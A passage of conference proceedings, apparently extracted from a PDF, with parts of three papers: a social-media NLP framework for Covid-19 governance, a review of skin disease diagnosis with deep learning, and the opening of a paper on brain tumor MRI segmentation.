ysis using unsupervised clustering and topic modelling has been done on Reddit
Mental Health Support groups dataset to understand the change in anxiety levels
in people pre and during the pandemic [7]. An EBKA, i.e. evidence based knowl-
edge acquisition approach has been demonstrated to aggregate novel and trustworthy
information from social media to augment the information about events happening
in real world, in this case Covid-19 [8].
Chen et al. have extensively reviewed the datasets and systems related to NLP
techniques for biomedical research, e.g. entity recognition in medical documents, Q
& A answering for building chat bot for Covid-19, discovering medical concepts and
literature based discovery, understanding EHR (electronic health records); however,
the social media text analytics has not been covered in much detail [9].
Swapnarekha et al. have done an extensive state of the art review of the existing
machine learning and intelligent computing research that is being done for diagnosis,
classification, forecasting, prediction and prevention of Covid-19 [2]. They have pro-
vided an extensive in depth review about how different machine learning and big data
analytics techniques are being used for various use cases related to Covid-19 pan-
demic. Some of the examples are: using algorithms like random forests, XGBoost,
SVM for detection of Covid-19 from chest/lungs X-rays and CT Scans; analysing
the impact of policy measures like social distancing, wearing masks in reducing
the transmission; use of linear regression, neural networks for forecasting and trend
prediction. A similar survey has been done by Bullock et al. to map the landscape
of AI & ML based applications that have been developed for Covid-19 across three
broad categories: Molecular (e.g. protein structure prediction, drug development,
vaccine discovery etc.); Clinical (e.g. medical imaging for diagnosis, disease track-
ing and prediction) and Societal (e.g. modelling and forecasting statistics, clustering
of nations based on various factors, public policy etc.) [3]. We used this review paper
specifically to understand the state of the AI & ML applications that have been devel-
oped for societal use cases. Though most of the research has been done for modelling
and forecasting the statistics related to spread of Covid-19; some very preliminary
and basic applications have been built to leverage the online social media for under-
standing public opinion and sentiment analysis, propagation of misinformation and
hate speech, and efficacy of public policy. As we could gauge from these two review
papers, not much research has been done to leverage machine learning and intelli-
gent computing techniques coupled with publicly available data over social media
for designing effective governance measures during pandemics. This research gap is
the main focus and contribution of our research paper; since real time big data from
social media is an untapped resource and can serve as an excellent decision making
tool for government bodies and help them better understand the public issues and
concerns at state and national level.
Efficacious Governance During Pandemics … 439
3 Proposed Framework
Our novel proposed framework for effective governance during pandemics like
Covid-19 is depicted in Fig. 1 and is explained in detail in this section. Our pro-
posed governance framework consists of three main modules: (1) Text pre-processing
pipeline (2) Information extraction module (3) social-economic trend prediction
module. The idea is to have real time tools developed and deployed which monitor
the publicly available user generated content on social media, and serve as a decision
support system to give meaningful insights to various government and nationalized
bodies. Such tools and technologies can assist decision making related to governance
measures and policies required in short and long term to handle crisis situation like
we are since 2020 due to global pandemic of Covid-19.
This module is a mandatory precursor to any analysis or system that leverages user
generated content from various popular social media platforms; mainly because the
user generated content is non standardized, is of multimodal and multilingual nature,
contains heterogeneous platform specific information, contains noise and is error
prone. Hence before utilizing machine learning and big data and text analytics tech-
niques the following pre-processing steps become essential.
Extract Platform Specific Information: Platform specific non textual information
like geolocation tags, @ mentions, # tags, must be separated from the textual content
in the user’s posts. Even though, this information is noise for any NLP based system,
Fig. 1 Proposed framework for efficacious governance during pandemics like Covid-19
440 R. Jindal and A. Malhotra
however in the scope of our current application, this information can be very useful
for contact tracing and identifying Covid-19 hotspots. Hence we extract and store the
geolocation tags, # tags, and @mentions that are used to tag people from the user’s
social media posts.
Cleaning and Noise Removal: In order to standardize the text from the user’s
social media posts and enhance the data quality of input to NLP and ML algorithms
that follow, it is essential to remove the noisy elements from texts. We pre-process the
text in the user’s posts by removing the special characters, punctuations, numerics,
emoticons, and URLs (which are very common in social media posts); the hashtags
and mentions have already been removed in the previous steps. Next, we also remove
the stop words (like a, the, and etc.) as they do not add any value w.r.t to information
extraction and trend prediction we wish to accomplish. Finally, case conversion is
done to bring uniformity as people usually are not very case conscious, while posting
on social media.
Tokenization: This is a fundamental step of any NLP pipeline in order to break or
extract meaningful tokens from the input text document, sentence or phrase. Tokens
are the logical inputs to any NLP algorithm and can be created in 3 ways: word level,
sub words level, i.e. n-grams, or character level. In our application since we aim to
infer meaningful topics, trends and entities; we perform word level tokenization to
extract the bag of words from user’s social media posts.
Lemmatization: This is the process of reducing the words from the document
vocabulary to their root word from which they are derived, in order the group together
and analyse the different inflected forms of the same base word as a single entity.
Unlike stemming, which a very crude heuristic process that chops of the affixes of a
word; lemmatization is done using proper grammatical and morphological rules and
correct identification of parts of speech. This step, reduces the dimensionality of the
documents (in our case user’s social media posts), and makes the feature matrix less
sparse.
Chunking and POS Tagging: Bag of words (tokens) approach described above
loses the meaningful information about the semantic structure and actual meaning
of the sentence. Chunking along with Part of Speech tagging, basically refers to
extracting phrases of words from the sentence to understand the logical sentence
structure. It helps to derive various constituents from unstructured text, i.e. nouns,
pronouns, adjectives, verbs, adverbs, prepositions, conjunctions and interjections.
Chunking and POS tagging are essential steps of Named Entity Recognition (NER),
which helps us extract the various constituents like names, places, events, dates etc.
from unstructured text. Additionally, for the topic modelling and thematic analysis
of user generated text, it is important to retain the logically related phrases instead
of mere individual tokens.
Efficacious Governance During Pandemics … 441
This module of our proposed system is designed to achieve the following goals:
measure geographical spread, identify Covid-19 hotspots, and assist in contact tracing
to identify probable cases, discover new symptoms and health condition indicators
related to the ongoing pandemic disease. Unstructured textual data (user’s post)
contains a vast amount of information, all of which may not be relevant for us in the
current context. Information extraction is basically a NLP task where we retrieve the
information of interest within the context of current information need and extract
structured pieces of information from free flowing text. We may be looking for
different pieces of information like names of entities, relationship between entities, a
place, a date, sequence of events, an idea, thought or a state of being. In our research,
our goal is to extract person names, places/locations, organizations, action verbs and
state of being which will help us in measuring geographical spread of pandemic,
identifying hotspots, contact tracing and discovering new health indicators related to
the pandemic. We have used three different information extraction techniques: Noun
phrase detection, Verb phrase detection and Named Entity Recognition to accomplish
the above mentioned tasks; the methodology and techniques adopted are explained
in detail below.
Noun and Verb Phrase Detection: In any communication language, there are
eight parts of speech, that basically determine the grammatical role a word plays in
the sentence. These are: nouns, pronouns, adjectives, verbs, adverbs, prepositions,
conjunctions and interjections. In NLP domain, the task of determining and assigning
a correct part of speech tag to each word in a sentence based on the role it plays is
called POS Tagging. POS Tagging helps to understand sentence structure and build
rules to extract the relevant information of interest. We use this NLP technique to
identify the noun and verb phrases in the user’s posts which are the most informative
pieces of user posts for our research problem. Nouns, as we all know represent
people, places, things and ideas and Verbs, are actions words or words that depict
a state of being. We implement POS Tagging and built rules to extract nouns and
verb phrases. This helps ascertain the geographical spread of the pandemic based on
statistical analysis of the user posts related to Covid-19 on social media within the
region and time duration of interest. We extracted proper nouns which could be the
names of people a user may have met or places he may have visited. The location tags
and mentions if available from the previous pre-processing step help to accurately
determine the user location and people who he may have come in contact with. The
government healthcare bodies can use this technique for effective contact tracing
which has proved to be a successful measure worldwide to contain the spread of the
pandemic. World witnessed the Covid-19 pandemic for the first time, and hence it
was seen during the initial days of pandemic that new symptoms of Covid-19 were
being updated in WHO list.2 The automated techniques like the one proposed in our
framework can discover the possibly associated new symptoms and heath indicators
related to a pandemic by aggregation and statistical analysis of verb phrases from the
2 https://www.who.int/emergencies/diseases/novel-coronavirus-2019/advice-for-public.
442 R. Jindal and A. Malhotra
Covid-19 related user generated content on social media. The verb phrases extracted
are action verbs and also denote the state of being. These can be retrieved from
users’ posts as it was seen users were writing about their health condition due to
the anxiety, uncertainty and paranoia related to Covid-19 in the initial months. Now
also, as the world is commencing the vaccination phase, it can assist the government
bodies to discover health indicators which the users are posting about to timely know
the adverse effects of the vaccinations which have been developed in an expedited
record time.
Entity Recognition: We use the popular NLP and AI based automated informa-
tion extraction technique called Named Entity Recognition (NER) to further augment
the information retrieved from users’ unstructured textual posts. NER is the task of
locating and identifying named atomic elements or entities from unstructured text,
and classifying them into predefined categories such as: people names, locations,
organization and company names, date and time objects, quantifying measures, cur-
rencies, artefacts etc. As per English dictionary: an entity is defined as a thing or
a concept with distinct characteristics and independent existence. Unlike POS tag-
ging which assigns part of speech tags to each word token, NER is able to extract
entities which may be a single word or word phrases (chunks) referring to the same
concept, thereby giving more meaningful learning and generating valuable insights
from large volumes of unstructured text. Machine learning models need to be trained
with relevant language literature to make them learn the different entity categories
and granular rules so that they are able to locate and identify the relevant entities
from unstructured text. In case of basic applications, one may even use a lexicon or
rule based NER system. However, in our niche and specialized use case, we would
need ML based trained models to build a generalized and scalable NER system that
works efficiently in a real time global application.
Information Aggregation: We have proposed a decision support framework for
effective governance related decision making during the pandemics using the unstruc-
tured data from users’ social media posts. An essential and desirable characteristic
of such an application are to be able to work in real time and process data streams
on 24*7 continuous basis. In order to handle the volume and velocity of the incom-
ing unstructured data stream in real time and for efficient processing, it is essential
to aggregate and categorize the information into meaningful buckets with logically
related and similar data. For this purpose, we implement unsupervised machine
learning algorithms: K -Means clustering and hierarchical agglomerative clustering
to group and aggregate the semantically related and similar information extracted
above. We group and cluster the similar noun and verb phrases and entities collected
above for quick consumption and comprehension by government officials from vari-
ous nationalized bodies working for pandemic management and containment. These
clusters of valuable information pieces can be presented to them via a dashboard or
a key word based search tool.
Efficacious Governance During Pandemics … 443
In the era of Web 3.0, social media platforms have become the primary medium
of communication for everyone. People post about their day to day activities, vaca-
tions, experiences, feelings, express emotions, opinions, thoughts, ideas etc. span-
ning across the whole gamut of human life. This phenomenon continued during this
unprecedented global crisis situation caused by the pandemic of Covid-19; and on
social media people were talking about a multitude of topics like work from home,
job losses, hunger, deaths, depression, domestic violence, supply chain of FMGC
goods, availability of hospitals and care, vaccination for corona, and what not. The
plethora of topics being talked about on social media has been dynamic and evolved
during the course of the pandemic through various month in 2020. For example, in
India initially people were talking about availability of sanitizers, masks and hospi-
tal care; then about imposed lockdown and the condition of migrant labourers, job
losses and work from home, vaccination development, GDP contraction and sectors
of economy which were impacted the most; users were also discussing about eco-
nomic and social reforms required for recovery in the later months of 2020. Presently,
people are talking about the efficacy and side effects of Covid-19 vaccinations, dif-
ferent vaccines available and their administration etc. These are just few examples.
The topics of conversations on social media varied across the globe from nation to
nation. But the underlying uniform characteristic of these social media conversations
is: they represent the common public concerns and interests, challenges and issues
faced by the common citizens, the impact and acceptability of the measure taken by
the government, and the future social and economic challenges that lie ahead of the
nation’s government to address in the coming years. It is a known fact now that the
world will take 3–5 years to fully recuperate from the social, economic and health-
care impact of Covid-19 pandemic. This is the main motivation behind choosing
social-economic global trend prediction as one of our research goals.
We use Latent Dirichlet Allocation (LDA) and Gibbs Sampling Dirichlet Mixture
Model (GSDMM) algorithm for topic modelling from unstructured user generated
text on social media. Topic modelling is an unsupervised machine learning technique
which builds a statistical topic model from raw unstructured text to discover hidden
and abstract topics, themes and ideas being discussed in them. Topic modelling
is an effective technique to quickly understand and summarize large volumes of
free form text and extract meaningful insights when annotated or labelled data is
not available. We implemented topic modelling in our proposed decision-making
governance framework as it can quickly build comprehension about what common
people are discussing on social media from the Covid-19 related user posts. As we
mentioned before, having this comprehension can help government bodies better
understand the common public concerns and challenges, opinions of citizens, and
discover various social and economic topics.
LDA algorithm [10] builds a statistical model based on the distribution of words
in any given input document by considering each document as a collection of topics;
further where each topic is a collection of semantically related dominant keywords.
444 R. Jindal and A. Malhotra
Various Twitter datasets of Covid-19 related tweets have been collected and made
publicly available for research3,4,5 [12]. We used the tweets from one of these pub-
licly available datasets6 ; this dataset has been collected since early March 2020, i.e.
the time when the onset of the pandemic began. It contains the Tweets by users who
applied various Covid-19 related hashtags, e.g. #coronavirus, #coronavirusoutbreak,
#coronaviruspandemic, #covid19, #ihavecorona etc. Out of this dataset, we selected
tweets in English language for India region, during the period of 29 March 2020 to
30 April 2020. This selected dataset had approximately 42,000 tweets, from various
locations in India as depicted in Fig. 2, along with the date-wise distribution of this
selected dataset Fig. 3.
We used the Cython based Spacy library for implementing our Information Extrac-
tion Module for extracting entities, noun and verb phrases. Spacy is the fastest library
for NLP tasks for building large scale, industrial, real world natural language under-
standing systems and is meant for production scale usage7 ; hence it is the first obvious
choice for implementing our Big Data framework. The most important entities and
nouns extracted from the selected dataset are depicted in Fig. 4.
Next, we used the Gensim python library to implement LDA algorithm for topic
modelling, and pyLDAvis for graphical visualization of topic-word clusters obtained.
For prototype implementation of GSDMM algorithm we referred to GitHub libraries
and tutorials.8,9,10 After multiple experiments, we extracted 17 topics with 317
unique words (i.e. Topic-Word (K,M) matrix of (17,317)), that had minimal overlap
between the topic clusters (ref. Fig. 5; top keywords from 2 sample topic clusters are
also shown in the figure.
As on date, there have been around 2.2 million deaths worldwide and over 100 million
Covid-19 cases.11 Covid-19 is an unforeseen global health emergency that has caused
fear, uncertainty, mental health issues and a lot of pain due to the irreplaceable loss
of loved ones. The collateral damage and impact of pandemic on the society and
economy cannot be accurately gauged and the lasting impact of this pandemic will
only be known in the years to come. Hence it becomes imperative for the government
3 https://www.kaggle.com/smid80/coronavirus-covid19-tweets.
4 https://github.com/ben-aaron188/covid19worry.
5 https://github.com/thepanacealab/covid19_twitter.
6 https://www.kaggle.com/smid80/coronavirus-covid19-tweets.
7 https://spacy.io/.
8 https://towardsdatascience.com/short-text-topic-modelling-70e50a57c883.
9 https://github.com/rwalk/gsdmm.
10 https://github.com/Matyyas/short_text_topic_modeling/blob/master/notebook_sttm_example.
ipynb.
11 https://www.worldometers.info/coronavirus/.
446 R. Jindal and A. Malhotra
and public institutions to monitor real time data, take data driven informed decisions,
and continuously observe their efficacy. Due to the popularity and gigantic user base,
social media platforms are a powerhouse for first hand information from citizens.
From the literature survey done, we did not find an extensive use of publicly available,
real time, social media data feeds for governance during the pandemic of Covid-19.
To address this research gap, we proposed an intelligent decision support framework
for efficacious governance that can immensely assist in data driven decision making
during such global emergency of any kind, presently the Covid-19 pandemic. As a
proof-of-concept, we have successfully demonstrated the prototype implementation
of our proposed framework on sample publicly available Covid-19 Tweet Dataset.
As part of our future research, we plan to enhance this governance framework to
incorporate multi-lingual and multi-modal user generated content, since India itself
has many vernacular languages. Another important module we wish to incorporate
in our governance framework will be for controlling the spread of misinformation
through social media since we all know it leads to unwanted fear, panic and anxiety
among the citizens of the country during such difficult crisis.
References
1. Alamo, T., Reina, D. G., & Millán, P. (2020). Data-driven methods to monitor, model, forecast
and control covid-19 pandemic: Leveraging data science, epidemiology and control theory.
arXiv preprint arXiv:2006.01731.
448 R. Jindal and A. Malhotra
Abstract The skin acts as a protection barrier against environmental danger and
foreign substances. Every year, thousands and millions of people are affected by skin
disorders that may cause skin cancer at later stage. The problem of skin disorders and
skin cancer is spreading fast due to exposure to sunlight, pollutants, chemicals like
nitrates, arsenic, and ultraviolet rays. This is an alarming disease, so it is necessary for
everyone to pay attention toward this. An automatic recognition of skin disease from
dermoscopic images is a big challenge due to the low contrast, a huge inter/intra-class
variation, and high visual similarity among the different skin lesions. With the explo-
sion of advanced information and recognition model, primarily the Deep Learning
(DL) and Transfer Learning (TL) models, all aspects of recent research have been
influenced. In this paper, a brief discussion is done about the skin disease and the work
that is already done using Machine Learning (ML) and Deep Learning (DL) models.
A system will be developed in future for early diagnosis of skin disease in which
the features of the dermoscopy images will be extracted using Convolutional Neural
Network (CNN). So, the system will be efficient in focusing on the right features of
the image and help in enhancing the accuracy by minimizing the amount of errors
in interpretation of image. It can provide more confident diagnosis to dermatologists
and can assist the doctors as a second opinion in providing accurate decisions.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 449
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_36
450 V. Anand et al.
1 Introduction
The skin is an outer covering which separates environment and body of human beings.
Skin is made of flexible outer tissue. It shows three main functions: protection, regu-
lation, and sensation. It regulates temperature of body and stores water, vitamin D,
and fat. The two main layers of skin are dermis and epidermis. Epidermis is outer-
most layer, separated from the dermis. Like dermis, the epidermis layer is not thick.
It does not contain blood vessels [1]. Melanocytes are located in the bottom layer of
the skin’s epidermis. Melanocytes are melanin-producing neural crest-derived cells,
whereas dermis is a connective tissue which is composed of two layers, deeper layer
is reticular layer, and the outer layer is superficial papillary layer, and hypodermis
consists of loose connective tissue with collagen and elastin fibers.
Skin disease includes skin infections which caused by exposure to sun where irregular
cells develop in the epidermis layer that is the outer layer of the skin. It is characterized
by dark wart like patches in the body which can be benign or malignant. Sometimes,
normal abnormalities of skin are also known as skin disease like birthmarks. The
various kinds of skin disease are discussed as follows:
(i) Actinic Keratoses (AKIEC): It is also known as a solar keratosis or Bowen’s
disease. It is a type of sun damage due to exposure to sun light in which the
abnormal cells develop in the topmost layer of the skin. It looks like a scaly
patch or rough skin as shown in Fig. 1. A small percentage of actinic keratosis
in the end can become skin cancer. It can be reduced by protecting skin from
ultraviolet (UV) rays [2].
(ii) Benign Keratosis or Seborrheic Keratosis (BKL): It is a non-cancerous
growth of skin. Older people has more of BKL. It is usually black, light
tan, or brown. The growths look slightly raised as shown in Fig. 2. They are
harmless and not contagious. The treatment is not required for this. On the
other hand, they can be removed if a person does not like how they look [4].
(iii) Dermatofibromas (DF): These are the growths small in size and are harmless
in nature which appears on the skin. These can grow on any part on the body,
but these are commonly seen on the lower legs, upper back, and arms as shown
in Fig. 3. These can be seen in adults but are very rare in children [5].
(iv) Melanocytic Nevi (NV): Melanocytic nevi or melanocytic nevus can be seen
on the body of almost all individuals as shown in Fig. 4. Some people have
few, while others have hundreds of melanocytic nevus on body [6].
(v) Vascular Lesions (VASC): Common abnormalities, more commonly known
as birthmarks as shown in Fig. 5.
(vi) Skin Cancer: Skin cancer is a type of cancer which develops on skin when
exposed to sunlight. Exposure to ultraviolet light or ionizing radiations can
also cause skin cancer. This problem is worse in high elevation areas or the
areas near equator where sunlight exposure is more intense. Infection from
medications such as chemotherapy can also cause skin cancer. People having
fair-skinned and fair-haired due to insufficient skin pigmentation are prone to
skin cancer. Also, exposure to pollutants of chemical (nitrates, arsenic, tar,
coal, oils, and paraffins) scars from severe burns can cause skin cancer. Skin
cancer falls into two major categories called non-melanoma and melanoma.
a. Melanoma (MEL): It affects melanocytes cells which exist in the lowest
epidermis layer. It tends to spread to other parts of the body, and it is malignant
in nature. It occurs in small and significant numbers. This is fatal if it is not
treated early. Sometimes existing mole that itches, bleeds, and changes shape
or color refers to melanoma cancer. It appears like small black spot or as larger
brownish patch with white or red speckles. Also, it can spread easily. It is linked
with melanocytes of epidermal layer. There is less curable rate for melanoma.
Figure 6 shows the dermoscopy image of melanoma and non-melanoma.
b. Non-Melanoma: It does not affect melanocytes. It is unlikely to spread to
other parts of the body. This cancer may be locally disfiguring if it is not
treated early. They progress slowly, spread beyond the skin and can be detected
easily and are usually curable. Figure 6b shows the dermoscopy image of
non-melanoma. The commonly occurring cancer is non-melanoma with more
than 4.3 million cases of basal cell carcinoma and over 1 million cases of
squamous cell carcinoma [7]. The broader category of non-melanoma skin
cancer includes basal cell carcinoma (BCC) and squamous cell carcinoma
(SCC).
• Basal Cell Carcinoma (BCC): It is widely recognized disease in people. The
main symptoms of BCC include a reddish bluish or brown black patch of skin.
It rises from basal layer of epidermis. It begins as a waxy nodule small in size
with pearly borders. BCC is categorized by erosion and invasion of adjoining
tissues. It rarely metastasizes, but its reappearance is common.
• Squamous Cell Carcinoma (SCC): It appears like scaly patch or like firm
reddish bump that grows gradually. It can be treated without difficulty if
primary detection is possible but it is most likely to spread as compared to
BCC. It is mostly seen in Black and Asian Indians. Figure 7b shows the image
of squamous cell carcinoma.
Early diagnosis of skin cancer includes removal and microscopic examination of
the cells. Among 30–50% of cancers can currently be prevented by avoiding risk
Skin Disease Diagnosis: Challenges and Opportunities 453
factors. The cancer burden can also be reduced through early detection of cancer and
management of patients who develop cancer [9].
2 Literature Review
The presence of skin disease can be identified by seeing the irregular edges, changed
color or sometimes patch on skin. Different researchers had designed different tech-
niques for diagnosis of skin disease using architectures of machine learning and deep
learning. The relevant literature in this domain presenting the work done by different
researchers is studied. Each researcher has tried to design a different model and
has obtained different level of accuracy in predicting this. Machine learning basi-
cally teaches computers to perform tasks that human can naturally perform. Machine
learning is less accurate to work with large amount of dataset for prediction purposes
[17, 18]. Garnavi et al. [19] had presented a clustering-based histogram thresholding
algorithm for segmentation. By using the algorithm, morphological operators are
utilized to obtain the segmented lesion. The algorithm was tested on 30 high reso-
lution dermoscopy images. It had achieved an accuracy of 97%. Fassihi et al. [20]
had shown segmentation by using morphologic operators and feature extraction by
using wavelet transform. In the pre-processing part, mean filter was used for noise
removal. It had achieved an accuracy of 90%. The dataset consists of 91 images taken
from hospitals and websites. Smaoui et al. [21] had done pre-processing followed by
segmentation process in which region growing was used. After that feature extraction
was done followed by ABCD rule. A set of 40 dermoscopic images was used. It had
achieved an accuracy of 92%, sensitivity of 88.88%, and specificity of 92.3%. Deep
learning (DL) learns different features directly from the given data. Deep learning
techniques are capable of handling data with high dimensionality and give better
performance. It is efficient in focusing on the right features of the image on its own.
Therefore, deep learning proves to be more efficient in comparison with machine
learning techniques as deep learning techniques can work with large databases and
Skin Disease Diagnosis: Challenges and Opportunities 455
with more accuracy. From the last years, improvements in deep learning convolu-
tional neural networks (CNN) have shown favorable results and also became a chal-
lenging research domain for classification in medical image processing [22]. Zafar
et al. [23] proposed a method by combining two architectures the U-Net and the
ResNet, collectively called Res-Unet. The dataset used was taken from PH2 dataset
with 200 dermoscopic images and ISIC-17 test data consisting of 600 images. On
456 V. Anand et al.
ISIC-17 dataset, the value of Jaccard index was 77.2%, and dice coefficient was
0.858, whereas on PH2 dataset, the value of Jaccard index was 85.4%, and dice coef-
ficient was 0.924. Amin et al. [24] performed pre-processing to resize the images
and used otsu algorithm to segment the skin lesion. The publicly available datasets
(PH2, ISBI 2016- 2017) were merged to form a single large dataset for the validation
of proposed method. The obtained results show sensitivity as 99.52%, specificity as
98.41%, positive predictive value as 98.59%, false negative rate as 0.0158, and accu-
racy as 99.00%. Mahbod et al. [25] investigated image down sampling and cropping
of skin lesion and a three-level fusion approach. A total of 12,927 dermoscopic skin
lesion images were used which were extracted from ISIC archive and HAM10000
dataset. It had achieved an accuracy of 86.2%. There are some limitations in this
work. The biggest limitation of the fusion approach is the large number of utilized
sub-models that consequently need significant training time.
3 Justification of Research
People are not considering skin disease in a serious way. So, nowadays, skin disease
is the cause of deaths worldwide. To prevent this, it is necessary to diagnose the
disease at early stages. Skin disease is one of the major causes of deaths in the US
and worldwide. The occurrence of this has been increasing in human’s day by day.
It is important to prevent skin disease; otherwise, it will become a skin cancer. It is
estimated that 196,060 new cases of melanoma, 95,710 non-invasive (in situ) and
100,350 invasive, will be diagnosed in the US in 2020. Invasive melanoma is projected
to be the fifth most common cancer for men (60,190 cases) and sixth most common
cancer for women (40,160 cases) in 2020 [26]. In 2020, it is estimated that 6,850
deaths will be attributed to melanoma 4610 men and 2240 women. Due to the lesser
number of trained dermatologists in the world, there is a difficulty in precise diagnosis
of skin disease in dermoscopy images. AI-enabled image analysis technique like deep
learning helps in getting the clear picture of disease in the image. Deep learning-
based systems can be employed to improve the performance of disease diagnosis in
the field of medical science by minimizing the amount of errors in interpretation of
image and enhancing the accuracy.
4 Research Gaps
Based on the literature survey conducted in the research area, the research gaps
identified are a large dataset is needed to reduce overfitting problem and for better
accuracy and generalization of the model. Fuzzy borders, noise, low brightness, skin
hair and bubbles, color variation are the issues varies from image to image. This will
always be the greater challenge to segregate the affected area present in dermoscopic
images. A number of skin lesions can mimic skin disease, which could result in
Skin Disease Diagnosis: Challenges and Opportunities 457
5 Problem Statement
collect the medical images. To resolve the issue, data augmentation technique can
be used to increase the number of images. The data augmentation on images is
done using different transformation techniques like flipping the image horizontally
and vertically. Also, other augmentation techniques such as rotation, brightness and
zooming can also be applied on the original image to increase the dataset size. After
that a CNN-based model will be proposed for accurate detection of skin disease
in dermoscopy images. Then, comparison will be done using different metrics like
precision, accuracy, specificity, sensitivity, f1 score and will validate the performance
with other state-of-art models.
6 Conclusion
Skin disease cases are increasing day by day. Therefore, early diagnosis of skin
disease is important; otherwise, it will become skin cancer. So it is necessary for
everyone to pay attention toward this. Therefore, the proper and early diagnosis of
skin disease is important to prevent any life threat caused by it. So, a deep learning-
based system will be developed in future for early diagnosis of skin disease in which
the features of the images will be extracted using convolutional neural network. So, it
will be efficient in focusing on the right features of the image and helps in enhancing
the accuracy by minimizing the amount of errors in interpretation of image. A model
with such an approach can assist the doctors in taking crucial decision and can help
to save life. Therefore, the proposed model design can aid in early diagnosis of skin
disease. It can provide more confident diagnosis to dermatologists and can assist the
doctors as a second opinion in providing accurate decisions.
References
1. Seeley, R., Stephens, D., & Philip, T. (2008). In Anatomy and physiology (pp. 1–1266).
McGraw-Hill.
2. Nouveau, S., & Braun, R. (2018). Solar lentigines-dermoscopedia. [Online Accessed August
19 2020].
3. Tschandl, P., Rosendahl, C., & Kittler, H. (2018). The HAM10000 dataset a large collection of
multi-source dermatoscopic images of common pigmented skin lesions. Scientific Data, 14(5).
4. Oakley, A. (2018). DermNet NZ Seborrhoeic Keratosis. [Online Accessed August 19 2020].
5. Pedro, Z. (2018). Dermatofibromas-dermoscopedia. [Online Accessed August 19 2020].
6. Braun, R. (2018). Benign melanocytic lesions-dermoscopedia. [Online Accessed August 19
2020].
7. Rogers, H. W., Weinstock, M. A., Feldman, S. R., & Coldiron, B. M. (2012). Incidence esti-
mate of non-melanoma skin cancer (keratinocyte carcinomas) in the US population. JAMA
dermatology, 151(10), 1081–1086.
8. Treatment Guides .(2007). “Squamous Cell Carcinoma—Treatment”. Retrieved on December
21, 2007 from https://www.skintherapyletter.com/skin-cancer/squamous-cell-carcinoma/.
9. World Health Organization. “Cancer Prevention”, Retrieved from https://www.who.int/cancer/
prevention/en/.
Skin Disease Diagnosis: Challenges and Opportunities 459
10. Bray, F., Ferlay, J., Soerjomataram, I., Siegel, R. L., Torre, L. A., & Jemal, A. (2018). Global
cancer statistics 2018: GLOBOCAN estimates of incidence and mortality worldwide for 36
cancers in 185 Countries. CA: A Cancer Journal for Clinicians, 68(6), 394–424.
11. https://www.medgadget.com/2011/01/handyscope_turns_iphone_into_professional_dermat
oscope.html.
12. Argenziano, G., Soyer, H. P., Giorgi, V. D., Piccolo, D., Carli, P., & Wolf, I. H. (2000) Interactive
Atlas of Dermoscopy-EDRA Medical Publishing & New Media.
13. Dermofit Image Library. https://homepages.inf.ed.ac.uk/rbf/DERMOFIT/datasets.htm.
14. Mendonça, T., Ferreira, P. M., Marques, J. S., Marcal, A. R., & Rozeira, J. (2013). PH 2-A
dermoscopic image database for research and benchmarking. In 2013 35th Annual International
Conference of the IEEE Engineering in Medicine and Biology Society (EMBC) (pp. 5437–
5440).
15. Kaggle Dataset https://www.kaggle.com/fanconic/skin-cancer-malignant-vs-benign.
16. https://www.isic-archive.com/#!/topWithHeader/wideContentTop/main.
17. Alzubi, J. A., Kumar, A., Alzubi, O. A., Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research and Development.
18. Alweshah, Alzubi, O. A., Alzubi, J. A., Mohammed, S. A. (2016). Solving attribute reduction
problem using wrapper genetic programming. International Journal of Computer Science and
Network Security.
19. Garnavi, R., Aldeen, M., Celebi, M. E., Bhuiyan, A., Dolianitis, C., & Varigos, G. (2010).
Automatic segmentation of dermoscopy images using histogram thresholding on optimal color
channels. International Journal of Medicine and Medical Sciences, 1(2), 126–134.
20. Fassihi, N., Shanbehzadeh, J., Sarrafzadeh, H., & Ghasemi, E. (2011) Melanoma diagnosis by
the use of wavelet analysis based on morphological operators. In International Multi Conference
of Engineers and Computer Scientists.
21. Smaoui, N., & Bessassi, S. (2013). A developed system for melanoma diagnosis. International
Journal of Computer Vision and Signal Processing, 3(1).
22. Tiwari, P., Qian, J., Li, Q., Wang, B., Gupta*, D., Khanna, A., Rodrigues, J., & Albuquerque,
V. (2018). Detection of subtype blood cells using deep learning. Cognitive Systems Research
(Elsevier).
23. Zafar, K., Gilani, S. O., Waris, A., Ahmed, A., Jamil, M., Khan, M. N., & Sohail, K.
A. (2020). Skin lesion segmentation from dermoscopic images using convolutional neural
network. Sensors, 20(6).
24. Amin, J., Sharif, A., Gul, N., Anjum, M. A., Nisar, M. W., Azam, F., & Bukhari, S. A. (2020).
Integrated design of deep features fusion for localization and classification of skin cancer.
Pattern Recognition Letters, 131, 63–70.
25. Mahbod, A., Schaefer, G., Wang, C., Dorffner, G., Ecker, R., & Ellinger I. (2020). Transfer
learning using a multi-scale and multi-network ensemble for skin lesion classification.
Computer Methods and Programs in Biomedicine.
26. American Academy of Dermatology Association .(2021).‘Skin Cancer’. Retrieved from https://
www.aad.org/media/stats-skin-cancer.
Computerized Assisted Segmentation
of Brain Tumor Using Deep
Convolutional Network
Abstract The cases related to brain tumors have risen dramatically in recent years,
which make an effect to all age group people and also the children. Brain tumor
treatment is challenging, especially in the determination of the spread of the tumor.
Magnetic resonance imaging (MRI) has been developed for diagnosing brain tumors
without ionizing radiation. It can be tedious and time-consuming to perform manual
segmentation of brain tumors from MRI scans, and the performance may vary if
the person diagnosing the scans changes. Therefore, a more efficient and reliable
method for segmentation of the brain tumor is necessary for measurement. This
paper discusses a segmentation algorithm for brain tumor with the help of U-Net
type deep convolutional networks.
1 Introduction
Brain tumors are invasive and can be dreadful and cause cancer because of its
pitiful condition and consequence on motor functions of different parts of brain.
The magnetic resonance imaging (MRI) image taken as input image of brain tumors
used for diagnosis and treatment approach. MRI scans are used to measure brain
tumor vascularity, cellularity and blood–brain barrier (BBB) integrity. Variation in
size, shape, location, appearance, etc., of tumor serve as a challenge and the unsuper-
vised and supervised techniques that have been proposed in the past have been quite
successful but not so much as expected. Even a slight mistake can cause the patient
his/her life, so a more efficient method of brain tumor image segmentation is required.
Unsupervised learning methods like Fuzzy Clustering with Region Growing, etc.,
have proven to be successful in the past with accuracy reaching up to 77%. Supervised
learning methods like extremely randomized forest with super pixel-based segmen-
tation have also proven to be quite successful with accuracy reaching up to 88%. With
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 461
